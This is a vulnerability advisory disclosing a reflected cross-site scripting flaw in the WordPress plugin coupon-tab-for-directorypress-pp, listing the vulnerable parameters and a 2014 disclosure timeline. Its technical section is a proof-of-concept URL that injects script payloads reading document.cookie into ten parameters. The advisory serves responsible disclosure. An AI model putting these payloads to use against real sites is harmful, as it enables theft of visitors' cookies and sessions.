wp-plugin : coupon-tab-for-directorypress-pp | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Coupon Tab for Directorypress Pp

Plugin Details

Plugin Name: wp-plugin : coupon-tab-for-directorypress-pp

Effected Version : 0.2.0 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Minimum Level of Access Required : Unauthenticated

CVE Number :

Identified by : Anantshri

WPScan Reference URL

Disclosure Timeline

January 4, 2014: Vendor Contacted
July 7, 2014 : Public Disclosure

Technical Details

http://localhost/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=</style><script>alert(document.cookie)</script>&cc=cc'><script>alert(document.cookie)</script>&cb=cb'><script>alert(document.cookie)</script>&cfd=cfd&ce=ce'><script>alert(document.cookie)</script>&cd=cd'><script>alert(document.cookie)</script>&cdt=cdt'><script>alert(document.cookie)</script>&cdet=cdet'><script>alert(document.cookie)</script>&cs=cs'><script>alert(document.cookie)</script>&cfw=cfw'></style><script>alert(document.cookie)</script>&surl=surl'><script>alert(document.cookie)</script>&

Vulnerable Parameter : cfh, cc, cb, cd, ce, cdt, cdet, cs, cfw, surl

Type of XSS : Reflected